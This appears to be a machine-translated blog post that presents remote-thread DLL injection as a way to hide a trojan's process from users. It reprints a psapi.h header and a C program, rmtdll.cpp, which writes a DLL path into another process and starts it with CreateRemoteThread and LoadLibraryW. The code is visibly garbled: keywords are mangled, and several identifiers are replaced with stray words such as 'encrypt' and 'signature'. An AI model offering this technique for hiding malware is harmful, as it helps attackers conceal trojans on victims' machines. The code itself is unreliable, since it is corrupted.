Hacker is easy to cause users' suspicion. Therefore, we need to use remote injection to hide the process. You can use the remote Thread Technology to start the trojan dll, or copy a piece of code to the remote memory space in advance, and then start the Code through the remote thread. No matter which method is used, the core code of the Trojan is run in the memory space of other processes. This not only hides itself well, but also protects itself better. At this time, the trojan not only deceives, but also enters the computer, or even the user process.
Psapi. h
#ifndef _PSAPI_H_#define _PSAPI_H_#if _MSC_VER > 1000#pragma once#endif#ifdef __cplusplusextern "C" {#endifBOOLWINAPIEnumProcesses( DWORD * lpidProcess, DWORD cb, DWORD * cbNeeded );BOOLWINAPIEnumProcessModules( HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded );DWORDWINAPIGetModuleBaseNameA( HANDLE hProcess, HMODULE hModule, LPSTR lpBaseName, DWORD nSize );DWORDWINAPIGetModuleBaseNameW( HANDLE hProcess, HMODULE hModule, LPWSTR lpBaseName, DWORD nSize );#ifdef UNICODE#define GetModuleBaseName GetModuleBaseNameW#else#define GetModuleBaseName GetModuleBaseNameA#endif // !UNICODEDWORDWINAPIGetModuleFileNameExA( HANDLE hProcess, HMODULE hModule, LPSTR lpFilename, DWORD nSize );DWORDWINAPIGetModuleFileNameExW( HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize );#ifdef UNICODE#define GetModuleFileNameEx GetModuleFileNameExW#else#define GetModuleFileNameEx GetModuleFileNameExA#endif // !UNICODEtypedef struct _MODULEINFO { LPVOID lpBaseOfDll; DWORD SizeOfImage; LPVOID EntryPoint;} MODULEINFO, *LPMODULEINFO;BOOLWINAPIGetModuleInformation( HANDLE hProcess, HMODULE hModule, LPMODULEINFO lpmodinfo, DWORD cb );BOOLWINAPIEmptyWorkingSet( HANDLE hProcess );BOOLWINAPIQueryWorkingSet( HANDLE hProcess, PVOID pv, DWORD cb );BOOLWINAPIInitializeProcessForWsWatch( HANDLE hProcess );typedef struct _PSAPI_WS_WATCH_INFORMATION { LPVOID FaultingPc; LPVOID FaultingVa;} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;BOOLWINAPIGetWsChanges( HANDLE hProcess, PPSAPI_WS_WATCH_INFORMATION lpWatchInfo, DWORD cb );DWORDWINAPIGetMappedFileNameW( HANDLE hProcess, LPVOID lpv, LPWSTR lpFilename, DWORD nSize );DWORDWINAPIGetMappedFileNameA( HANDLE hProcess, LPVOID lpv, LPSTR lpFilename, DWORD nSize );#ifdef UNICODE#define GetMappedFileName GetMappedFileNameW#else#define GetMappedFileName GetMappedFileNameA#endif // !UNICODEBOOLWINAPIEnumDeviceDrivers( LPVOID *lpImageBase, DWORD cb, LPDWORD lpcbNeeded );DWORDWINAPIGetDeviceDriverBaseNameA( LPVOID ImageBase, LPSTR lpBaseName, DWORD nSize );DWORDWINAPIGetDeviceDriverBaseNameW( LPVOID ImageBase, LPWSTR lpBaseName, DWORD nSize );#ifdef UNICODE#define GetDeviceDriverBaseName GetDeviceDriverBaseNameW#else#define GetDeviceDriverBaseName GetDeviceDriverBaseNameA#endif // !UNICODEDWORDWINAPIGetDeviceDriverFileNameA( LPVOID ImageBase, LPSTR lpFilename, DWORD nSize );DWORDWINAPIGetDeviceDriverFileNameW( LPVOID ImageBase, LPWSTR lpFilename, DWORD nSize );#ifdef UNICODE#define GetDeviceDriverFileName GetDeviceDriverFileNameW#else#define GetDeviceDriverFileName GetDeviceDriverFileNameA#endif // !UNICODE// Structure for GetProcessMemoryInfo()typedef struct _PROCESS_MEMORY_COUNTERS { DWORD cb; DWORD PageFaultCount; SIZE_T PeakWorkingSetSize; SIZE_T WorkingSetSize; SIZE_T QuotaPeakPagedPoolUsage; SIZE_T QuotaPagedPoolUsage; SIZE_T QuotaPeakNonPagedPoolUsage; SIZE_T QuotaNonPagedPoolUsage; SIZE_T PagefileUsage; SIZE_T PeakPagefileUsage;} PROCESS_MEMORY_COUNTERS;typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;#if (_WIN32_WINNT >= 0x0501)typedef struct _PROCESS_MEMORY_COUNTERS_EX { DWORD cb; DWORD PageFaultCount; SIZE_T PeakWorkingSetSize; SIZE_T WorkingSetSize; SIZE_T QuotaPeakPagedPoolUsage; SIZE_T QuotaPagedPoolUsage; SIZE_T QuotaPeakNonPagedPoolUsage; SIZE_T QuotaNonPagedPoolUsage; SIZE_T PagefileUsage; SIZE_T PeakPagefileUsage; SIZE_T PrivateUsage;} PROCESS_MEMORY_COUNTERS_EX;typedef PROCESS_MEMORY_COUNTERS_EX *PPROCESS_MEMORY_COUNTERS_EX;#endifBOOLWINAPIGetProcessMemoryInfo( HANDLE Process, PPROCESS_MEMORY_COUNTERS ppsmemCounters, DWORD cb );typedef struct _PERFORMACE_INFORMATION { DWORD cb; SIZE_T CommitTotal; SIZE_T CommitLimit; SIZE_T CommitPeak; SIZE_T PhysicalTotal; SIZE_T PhysicalAvailable; SIZE_T SystemCache; SIZE_T KernelTotal; SIZE_T KernelPaged; SIZE_T KernelNonpaged; SIZE_T PageSize; DWORD HandleCount; DWORD ProcessCount; DWORD ThreadCount;} PERFORMACE_INFORMATION, *PPERFORMACE_INFORMATION;BOOLWINAPIGetPerformanceInfo ( PPERFORMACE_INFORMATION pPerformanceInformation, DWORD cb );typedef struct _ENUM_PAGE_FILE_INFORMATION { DWORD cb; DWORD Reserved; SIZE_T TotalSize; SIZE_T TotalInUse; SIZE_T PeakUsage;} ENUM_PAGE_FILE_INFORMATION, *PENUM_PAGE_FILE_INFORMATION;typedef BOOL (*PENUM_PAGE_FILE_CALLBACKW) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCWSTR lpFilename);typedef BOOL (*PENUM_PAGE_FILE_CALLBACKA) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCSTR lpFilename);BOOLWINAPIEnumPageFilesW ( PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine, LPVOID pContext );BOOLWINAPIEnumPageFilesA ( PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine, LPVOID pContext );#ifdef UNICODE#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKW#define EnumPageFiles EnumPageFilesW#else#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKA#define EnumPageFiles EnumPageFilesA#endif // !UNICODEDWORDWINAPIGetProcessImageFileNameA( HANDLE hProcess, LPSTR lpImageFileName, DWORD nSize );DWORDWINAPIGetProcessImageFileNameW( HANDLE hProcess, LPWSTR lpImageFileName, DWORD nSize );#ifdef UNICODE#define GetProcessImageFileName GetProcessImageFileNameW#else#define GetProcessImageFileName GetProcessImageFileNameA#endif // !UNICODE#ifdef __cplusplus}#endif#endif
Rmtdll. cpp
# Include <windows. h> # include <stdlib. h> # include <stdio. h> # include "psapi. H "DWORD processtopid (char *); void checkerror (INT, Int, char *); void usage (char *); pdword pdwthreadid; handle hremotethread, hremoteprocess; DWORD fdwcreate, dwstacksize, dwremoteprocessid; pwstr pszlibfileremote = NULL; void main (INT argc, char ** argv) {int ireturncode; char lpdllfullpathname [max_path]; wchar pszfilename [max_path] = {0 }; if (ARG C! = 3) usage ("parametes number incorrect! "); Else {printf (" % sldskglisagi "); If (isdigit (* argv [1]) dwremoteprocessid = atoi (argv [1]); elsedwremoteprocessid = processtopid (argv [1]); If (strstr (argv [2], ": //")! = NULL) strncpy (argv [2], lpdllfullpathname, max_path); else {ireturncode = getcurrentdirectory (max_path, lpdllfullpathname); checkerror (ireturncode, 0, "getcurrentdirectory "); strcat (lpdllfullpathname, "//"); strcat (lpdllfullpathname, argv [2]); printf ("Convert DLL filename to fullpathname: /n % s/n ", lpdllfullpathname);} ireturncode = (INT) _ lopen (lpdllfullpathname, of_read); checkerror (ireturncode, hfile_error," DLL file Not Exist "); ireturncode = multibytetowidechar (cp_acp, signature, lpdllfullpathname, strlen (signature), pszlibfilename, max_path); checkerror (ireturncode, 0," signature "); wprintf (L "will inject % s", pszlibfilename); printf ("invalid process: % spid = % d/N", argv [1], dwremoteprocessid );} hremoteprocess = OpenProcess (process_create_thread | process_vm_operation | process_vm_write, false, dwremoteprocessid ); Checkerror (INT) hremoteprocess, null, "remote process not exist or access denide! "); Int cb = (1 + lstrlenw (pszlibfilename) * sizeof (wchar); pszlibfileremote = (pwstr) virtualallocex (hremoteprocess, null, CB, mem_commit, page_readwrite ); checkerror (INT) pszlibfileremote, null, "virtualallocex"); ireturncode = writeprocessmemory (hremoteprocess, callback, (pvoid) pszlibfilename, CB, null); checkerror (ireturncode, false, "writeprocessmemory"); pthread_start_routine pfnstartaddr = (pthread_start_routine) Getprocaddress (getmodulehandle (text ("Kernel32"), "loadlibraryw"); checkerror (INT) pfnstartaddr, null, "getprocaddress"); hremotethread = encrypt (hremoteprocess, null, 0, pfnstartaddr, pszlibfileremote, 0, null); checkerror (INT) pfnstartaddr, null, "Create remote thread"); waitforsingleobject (hremotethread, infinite); If (pszlibfileremote! = NULL) virtualfreeex (hremoteprocess, pszlibfileremote, 0, mem_release); If (hremotethread! = NULL) closehandle (hremotethread); If (hremoteprocess! = NULL) closehandle (hremotethread);} DWORD processtopid (char * inputprocessname) {DWORD aprocess [1024], cbneeded, cprocesses; unsigned int I; handle hprocess; hmodule hmod; char szprocessname [max_path] = "unkonwnprocess"; // calculates the number of processes currently in use. aprocesses [] is used to store valid processes pidsif (! Enumprocesses (aprocess, sizeof (aprocess), & cbneeded) return 0; cprocesses = cbneeded/sizeof (DWORD ); // traverse all processes by valid PID (I = 0; I <cprocesses; I ++) {// open the process hprocess = OpenProcess (process_query_information | process_vm_read, false, aprocess [I]); // obtain the process name of a specific PID if (hprocess) {If (enumprocessmodules (hprocess, & hmod, sizeof (hmod), & cbneeded )) {getmodulebasename (hprocess, hmod, szprocessname, sizeof (szprocessname ); If (! _ Stricmp (szprocessname, inputprocessname) {closehandle (hprocess); Return aprocess [I] ;}}// end of IF (hprocess )} // end of for // the corresponding process name is not found, and 0 closehandle (hprocess); Return 0 ;}// end of processtopid // The error handling function checkerror () is returned () // If ireturncode is equal to ierrorcode, perrormsg is output and void checkerror (INT ireturncode, int ierrorcode, char * perrormsg) {If (ireturncode = ierrorcode) is released) {printf ("% s error: % d/n", perrormsg, getlasterr Or (); // clear if (pszlibfileremote! = NULL) virtualfreeex (hremoteprocess, pszlibfileremote, 0, mem_release); If (hremotethread! = NULL) closehandle (hremotethread); If (hremoteprocess! = NULL) closehandle (hremoteprocess); exit (0) ;}// end of checkerror () // usage description function usage () void usage (char * perrormsg) {printf ("% s/n", perrormsg); printf ("/T/tremote process DLL by liangshuai/N "); printf ("/tThis program can inject a DLL into remote process/N"); printf ("Email:/N"); printf ("/tshuai52@126.com/N "); printf ("Usage:/N"); printf ("/trmtdll.exe PID [| processname] dllfullpathname/N"); printf ("Example:/N "); printf ("/trmtdll.exe 1024 C: // windows // system32 // mydll. dll/N "); printf ("/trmtdll.exe erer.exe C: // mydll. dll/N "); exit (0 );}